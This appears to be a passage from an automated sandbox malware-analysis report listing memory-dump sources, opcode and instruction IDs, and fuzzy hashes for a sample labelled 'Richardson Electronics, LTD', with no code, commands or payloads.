                                                              • Opcode Fuzzy Hash: 09e968939a47a8688305a6472ba29c73730c7829717bcdf374218c1995e27971
                                                              • Instruction Fuzzy Hash: 3A31D074D50229CFDB54CFA8C984BADBBB1FB09314F1041AAE649AB640DB305A85CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 691f98b99c5f78d5417bfa203dd9dec06a06d1e0d99265569549c493eed5bc84
                                                              • Instruction ID: 5b976b4774583d09824982c33bc1f6733cd3199ac5464f11b863b26f8ba3f766
                                                              • Opcode Fuzzy Hash: 691f98b99c5f78d5417bfa203dd9dec06a06d1e0d99265569549c493eed5bc84
                                                              • Instruction Fuzzy Hash: 9D216870E112189FDB04DFA9D485AEDBBF2AF88700F648169D501BB391DB749D45CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 131c00a78acca38a635f0b3765ec8a4d3077335f3a8925a22f34edae45d1b599
                                                              • Instruction ID: 726c09b12c3e04d59402696b58d8f8e4d1612600472ed9512582b5c28ae5f430
                                                              • Opcode Fuzzy Hash: 131c00a78acca38a635f0b3765ec8a4d3077335f3a8925a22f34edae45d1b599
                                                              • Instruction Fuzzy Hash: 242190306502059FE748EB68D84476E7BF6FFC5300F40452DD10ADB684DFB999098BD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50e427d1ca6f8170e2f74558ed15b0565c82d2c2d32bb4bcf2dee480fd24ec07
                                                              • Instruction ID: 4d4dda5acc49c34ae710a12c074cc38b857e25a9a6cb1096d7fb856a58132e9f
                                                              • Opcode Fuzzy Hash: 50e427d1ca6f8170e2f74558ed15b0565c82d2c2d32bb4bcf2dee480fd24ec07
                                                              • Instruction Fuzzy Hash: D3213570E0524ACFDB80DFA9D8486EEBBF1FF8A300F1085AAD414A3295D7741A45CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ea178dc0eca1ea1c6599f60a37d82f62b659785932eafade3fa22147dd71742
                                                              • Instruction ID: 8dfa9cfd0d7e4d4b2b9ac0c276b084950e794b9d62fab2b2fdc2424dfabc9df4
                                                              • Opcode Fuzzy Hash: 3ea178dc0eca1ea1c6599f60a37d82f62b659785932eafade3fa22147dd71742
                                                              • Instruction Fuzzy Hash: FD214F78E0021ACFCB14CFA9C9848AEB7B6FF88710B1581A9DA05A7325D734D841CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 128955e609842e20bc45a5e59f666b303bfd60d1c4034fb0f11e11a06327c36e
                                                              • Instruction ID: 300e468c5dbf20bdfaa9d53bbe2988667090fcb0792b1a65351f15cc4ff067e8
                                                              • Opcode Fuzzy Hash: 128955e609842e20bc45a5e59f666b303bfd60d1c4034fb0f11e11a06327c36e
                                                              • Instruction Fuzzy Hash: DA01B53528A3956FC75613397C119FB7FAE4FC3510B044097F944CB592CA249956C3F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53d1e83f2f208c7206d29f4ea7c8b58ad6cb835f7522464da85229027923b1e7
                                                              • Instruction ID: ba605c7d632bd538a0398ebbcd40df27e2aabf0bdc5b5b0a4ec70e8f5bdd61a9
                                                              • Opcode Fuzzy Hash: 53d1e83f2f208c7206d29f4ea7c8b58ad6cb835f7522464da85229027923b1e7
                                                              • Instruction Fuzzy Hash: F9113230858389EFC795DFB4C4085697FF49F06200F1806EED8C48F2A2EA715E82CB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f056047b31c1387ee191898f1a89b2f2ed23d38e6606dd455a0125fd7ae8eb83
                                                              • Instruction ID: f0e81ee027a6f31664dc5b39bab9ef8704dcc72660f893a17fcbaf4fe01cca2b
                                                              • Opcode Fuzzy Hash: f056047b31c1387ee191898f1a89b2f2ed23d38e6606dd455a0125fd7ae8eb83
                                                              • Instruction Fuzzy Hash: 1D11EF35BC03149FDBA48F6AD801BAE7FFAEB88701F004029F546DB280DA74C941CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72c8cc54cb429834ee1bb60fe1be6bf0374943cca777feede65396313115a62b
                                                              • Instruction ID: 51d722972536fd1b54d882cd86353aff97ec1a8794421bec633def5749e3eb92
                                                              • Opcode Fuzzy Hash: 72c8cc54cb429834ee1bb60fe1be6bf0374943cca777feede65396313115a62b
                                                              • Instruction Fuzzy Hash: A6213374E4420DDFDB80CFA9E8482EEBBF5BF8A300F508565D415A3244DB745A448F90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 438a383da7ddf1bf18d1d4c00aa2948568f164dd5e3c912660ba79994dc75cc3
                                                              • Instruction ID: 13cad54343054dbef619a0a17d8ee7385919d3c720f8e465cbb13ec00a6bcb9e
                                                              • Opcode Fuzzy Hash: 438a383da7ddf1bf18d1d4c00aa2948568f164dd5e3c912660ba79994dc75cc3
                                                              • Instruction Fuzzy Hash: 8B112334849389EFD752DFB8C40455A7FF49F02300F2486EDD4848B2A2DA728D86DB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46b846984c4725691f58a6774b069372299412aa7a7e75feae5da12fe45a9895
                                                              • Instruction ID: 259a891f9a3834828db7e829c73b537c5c7c15d0a0097a0ae5a654ad922eb752
                                                              • Opcode Fuzzy Hash: 46b846984c4725691f58a6774b069372299412aa7a7e75feae5da12fe45a9895
                                                              • Instruction Fuzzy Hash: F1113770D1020ACFDB08CFA9D8866EEBBF6FB88350F00812AD614B3254DB745A44CB94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1fa03bd75e514828e717ca86248ad43fc0f6b1eb3050edc6944a086088210332
                                                              • Instruction ID: 21fe42255da5d8e703c4e71cda8cd4098afa641ddf3eb8bdd331a18303ffb7f3
                                                              • Opcode Fuzzy Hash: 1fa03bd75e514828e717ca86248ad43fc0f6b1eb3050edc6944a086088210332
                                                              • Instruction Fuzzy Hash: ED11BF30C69389EFCBE5CFF4940029DBFF4AB06310F2041EAD9409A291D2768E81DB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0aed8da764f8e7e52481eb3152765a7b1b6a3ebd099c4caa7b981b6f4acd8f3b
                                                              • Instruction ID: 3f77242fa17c24080feb28dbdcd136d34860494feb49e774af9177fcc9f04694
                                                              • Opcode Fuzzy Hash: 0aed8da764f8e7e52481eb3152765a7b1b6a3ebd099c4caa7b981b6f4acd8f3b
                                                              • Instruction Fuzzy Hash: 6B11E9308493859FC792DFF4C81469E7FF49F07204F1402DAD8889B292E6354E41CBE1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f94c4677a1eb6cb7c270c48583ad91540178c4b3a4fdabb99ddc2b86835b2d2
                                                              • Instruction ID: b59dc8aed0a864a5bc82e0d4f254342770fb314ac4739e384532083c8ab52efd
                                                              • Opcode Fuzzy Hash: 3f94c4677a1eb6cb7c270c48583ad91540178c4b3a4fdabb99ddc2b86835b2d2
                                                              • Instruction Fuzzy Hash: B1118835858388EFC795DFF8D90469A7FB49F06200F1102DAD8844B292EE714E86DB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce4c3a9957dda707308b32f9f6155a193fb68e29577a095a77b153275a15b946
                                                              • Instruction ID: b6dd5a6bfdbf9dc1bb00a4b227a34ab4dfa3476436ed74ad266a56fc0af92124
                                                              • Opcode Fuzzy Hash: ce4c3a9957dda707308b32f9f6155a193fb68e29577a095a77b153275a15b946
                                                              • Instruction Fuzzy Hash: EC118B31780224CFCBA5AB69E81897E3BA6EFC42653144029FD56CB351DF35CC06CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab287aaf66e224df31b8e649e945907cce9964190aeae5d098bc678e269de50a
                                                              • Instruction ID: cc0c9e95c3b584cf7518bc0bdb395f94f228b781bd1be0a8c5becf52f4ce0ce2
                                                              • Opcode Fuzzy Hash: ab287aaf66e224df31b8e649e945907cce9964190aeae5d098bc678e269de50a
                                                              • Instruction Fuzzy Hash: 8F11AB30988389DFC752EFB8D40469E7FF59F46300F1482D9D4444B292DB318E42DB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4dee44eaf56a9789fcedfb2fd8eac408fd025c2095ad96f8e0e6f4c2d28b5b05
                                                              • Instruction ID: 8f0207908dda0196134b0f5740d66988873fa972f4d6ea3be826d9c1efbce1bc
                                                              • Opcode Fuzzy Hash: 4dee44eaf56a9789fcedfb2fd8eac408fd025c2095ad96f8e0e6f4c2d28b5b05
                                                              • Instruction Fuzzy Hash: E9112270D59348EFDB94DFB8D405AADBFF8EF09310F1086AAD94497221D2318A80CB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 250433189b3326ed9e1188accbcb61096520865a8ac4d13c6cb9c62ef75585ab
                                                              • Instruction ID: c7e0a165349f94c1433a1a99ea533b1b1940fb9a9b1dc87a21431aecb8ee434e
                                                              • Opcode Fuzzy Hash: 250433189b3326ed9e1188accbcb61096520865a8ac4d13c6cb9c62ef75585ab
                                                              • Instruction Fuzzy Hash: DA11363254438DEFCB52CFB0C900A9A7FF1DF06220F1446D9E8584B2A2DB328D82DB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b805470c8297c22721e94c3d70781196f2399fb7bfcb1b0d67181bc080bb85f6
                                                              • Instruction ID: 2dadf0c4613e57af4cd1d4c9cecda1220c5b58f32799ad05073d0a5afbee0f14
                                                              • Opcode Fuzzy Hash: b805470c8297c22721e94c3d70781196f2399fb7bfcb1b0d67181bc080bb85f6
                                                              • Instruction Fuzzy Hash: 41119A35BC02149FDBA4DB6AD954BAE7FF6AB88601F104029E646DB280DA74C941CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5eb80d0d74ad8a5138e5d35c5c41ea19bbde15be3f9cdfa30b5d86585ae067a
                                                              • Instruction ID: 6df05b23584a21233b6ec7d109d01bb90b8164982922b7735f9c9b0c35f79801
                                                              • Opcode Fuzzy Hash: f5eb80d0d74ad8a5138e5d35c5c41ea19bbde15be3f9cdfa30b5d86585ae067a
                                                              • Instruction Fuzzy Hash: 95215F78A82219DFDB44CFA8D994AADBBF2BF49304F504155F902AB361CB34AD41CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb57c5ec1134e445e897b6cf5c4fd445f989cbc77e6dfcb18ead0ff08d42f9fa
                                                              • Instruction ID: 766b12a7dc3d2ccf4c74f1773cdd4c7fc109eed992cdcc38edc11a4b8d0d169f
                                                              • Opcode Fuzzy Hash: eb57c5ec1134e445e897b6cf5c4fd445f989cbc77e6dfcb18ead0ff08d42f9fa
                                                              • Instruction Fuzzy Hash: A221BE74A10218CFDBA4DFA8E49879DBBB2BB09304F5080A9D949A7384DB355E85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e9cb2314b6351979c5fd46ba4cb10c9c5e8236611ccb65b41ab581c566ba535
                                                              • Instruction ID: 6d1993753e141ffd7dab34df31af6d0970b237e1b31993d22b33d3d3820774f5
                                                              • Opcode Fuzzy Hash: 0e9cb2314b6351979c5fd46ba4cb10c9c5e8236611ccb65b41ab581c566ba535
                                                              • Instruction Fuzzy Hash: 79118835848388EFCB66DFB4D50461E7FF49F16310F1482DAD9084B293DA328E42D782
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4953d381d0ea043af5a5461a1933fa884ec1bc627ec389eb32bf8fc5d5433638
                                                              • Instruction ID: 757c27f6c0a4dcff1e5d6a2036698b4a9d517f86c9bdae96fe26997b7ce154cf
                                                              • Opcode Fuzzy Hash: 4953d381d0ea043af5a5461a1933fa884ec1bc627ec389eb32bf8fc5d5433638
                                                              • Instruction Fuzzy Hash: F311CB30C6A389DFCB90CFA0D5442ADBFF5EB46300F2442AAC448A7745C7329A80CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d73e54e3af9339308a4ee560586647f21991d030e7fdd6849d609525bbd54788
                                                              • Instruction ID: b37f94137055ce3e1ab18dec79d1b930a566c25c3194c14157a193166791c786
                                                              • Opcode Fuzzy Hash: d73e54e3af9339308a4ee560586647f21991d030e7fdd6849d609525bbd54788
                                                              • Instruction Fuzzy Hash: A8112635909384DFC786DFB4D9046997FF4AF07204F1402EAD8885B262DB314E45DB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55c72f7e59fc836fbf146af7601a149c199857a17a20d6e09dd0e2f6248498a1
                                                              • Instruction ID: 130a94fffe0d0acbcb91629d23c23b0ecde3d61e24a79bb1fe16ffb134776ef0
                                                              • Opcode Fuzzy Hash: 55c72f7e59fc836fbf146af7601a149c199857a17a20d6e09dd0e2f6248498a1
                                                              • Instruction Fuzzy Hash: 1D217E78E4422DCFDBA4CF64D888BD9BBB1BB49304F0485E9D90AA7244DB315E81DF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a040f5655595a1bd3b1837ae00e7b4d6e3c810be377bc84fbf11384fc586ecc
                                                              • Instruction ID: 4a34aa4aecadd6e9e9b7f44c3ca2c090debab73a17cfe235751a1c5dabfaa65b
                                                              • Opcode Fuzzy Hash: 7a040f5655595a1bd3b1837ae00e7b4d6e3c810be377bc84fbf11384fc586ecc
                                                              • Instruction Fuzzy Hash: 0A1125718493889FCB41CBB4D90465D7FF49F06204F1442DAC8088B292EA318E42C782
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a85175552293c9599a50f3ac1030043c6089032403117e4683f252be96e2ee4e
                                                              • Instruction ID: 396a10b1212a4dd847bb3a997f7dc8b07d449bcb2e78f2d74a0adff8bece2d55
                                                              • Opcode Fuzzy Hash: a85175552293c9599a50f3ac1030043c6089032403117e4683f252be96e2ee4e
                                                              • Instruction Fuzzy Hash: C301ED343443409FD3AA9A31C814A7B3FE2EF86314F04865DF1928B791CBB1A842C7A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168a65ca5bdee2adf56cf490f69bb70250272554bdb76eac469a239599686f7
                                                              • Instruction ID: fcb1a8ac4a2d9ca32ce66693844e8b9ca6ef1bc2c77c451476117d62ac56c4a1
                                                              • Opcode Fuzzy Hash: 6168a65ca5bdee2adf56cf490f69bb70250272554bdb76eac469a239599686f7
                                                              • Instruction Fuzzy Hash: CA014836380215AFDB148E59EC84F9B77A9FF99721F104066FA15CB290CAB1D810CB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6fca1360598cccf331f39a19c1a79e72606bf64eca43e1fe0429885c534159a
                                                              • Instruction ID: 74d3f7c1c7ba56f7daa81a3c636fa014f6bed21875e08e19ab7ff87ef6aa4409
                                                              • Opcode Fuzzy Hash: c6fca1360598cccf331f39a19c1a79e72606bf64eca43e1fe0429885c534159a
                                                              • Instruction Fuzzy Hash: 2511CE70D2838ACFCB94CFB9C4452AEBFF1AF45300F2486AAC154E7245E7764682CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8497e98e949639c7fb6e4993270fcd5416af3d8c579dead6e1c55c1ab0684d02
                                                              • Instruction ID: e478900d76042375b25f74f19d1ac1f5c3d6fc2e3580e40082e8a046fef4c757
                                                              • Opcode Fuzzy Hash: 8497e98e949639c7fb6e4993270fcd5416af3d8c579dead6e1c55c1ab0684d02
                                                              • Instruction Fuzzy Hash: 86110476901258CFDBA1CF64C894BC8BBB5BF09300F2582DAD409A7251DB309B85CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 883cbbd9b0c6a6d0a09bbb9fffba1871743ed86b1883c112678034e74785cbf9
                                                              • Instruction ID: 2df8858e6772d9ddfdf90297e61e9dbe0937ca0b54db0f02f84019abc976c160
                                                              • Opcode Fuzzy Hash: 883cbbd9b0c6a6d0a09bbb9fffba1871743ed86b1883c112678034e74785cbf9
                                                              • Instruction Fuzzy Hash: 6C01F530D45388DFC791DBB8D94469EBFF8DF05204F1003EAD8449B281D6B14A42D791
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c5b231cb634007f81e8eba34f4e3a0e59196da84749ba2adb3676f6b1d3fd88
                                                              • Instruction ID: e90c4844d8cf8e01f1ba76dcf0ede96b0509101105577e16200868390cd61005
                                                              • Opcode Fuzzy Hash: 9c5b231cb634007f81e8eba34f4e3a0e59196da84749ba2adb3676f6b1d3fd88
                                                              • Instruction Fuzzy Hash: 4A11A2B0E0020ADFDB44DFA9C9457BFBBF5FF88300F20856A9518A7355DA709A418B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61f2b34f9239b118f61cae8d9d3e1c8050447a2ae6d442e2ee7b99815d4719f9
                                                              • Instruction ID: 3fbd9fb70df090297d769856545e42a8b9b23e761af379781481560c2868d0a1
                                                              • Opcode Fuzzy Hash: 61f2b34f9239b118f61cae8d9d3e1c8050447a2ae6d442e2ee7b99815d4719f9
                                                              • Instruction Fuzzy Hash: 30017835751220CFCBA5AB39E81893E3BA6EF852553154069FC16CB351EF39CC06CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e452590abedcd56555f068c71f134057dcc73d323d6088dbd07fbdbc1b1b5e00
                                                              • Instruction ID: d398449ef23ffe5e7f39185c4fdc1615dee58d5eb65309eba9d01cbdb403130f
                                                              • Opcode Fuzzy Hash: e452590abedcd56555f068c71f134057dcc73d323d6088dbd07fbdbc1b1b5e00
                                                              • Instruction Fuzzy Hash: EA01D435341604EFC319DB64E41495ABBA2EFCDB11B108169E9468B790CF35EC42CBE1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77f19c05ff3ef462bd51f640ed96691da9116acacb0b4ebe6a67aab09dc41782
                                                              • Instruction ID: 5106b8f8caab276b1864e8e5771e526b51d4baf9323ad104683a9979f442174d
                                                              • Opcode Fuzzy Hash: 77f19c05ff3ef462bd51f640ed96691da9116acacb0b4ebe6a67aab09dc41782
                                                              • Instruction Fuzzy Hash: B1113970E10219CFDF14CFA8D541ADDBBB2BF88710F648169D601BB281CB759D41CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dccafc1b43c83948bf55c5fd92efc18c54504a6e7dc352030a76bd0df6cda08f
                                                              • Instruction ID: 646540045427cebf726ed78a0652270eaf62748fb23d1755dbc3b49bd57bfb92
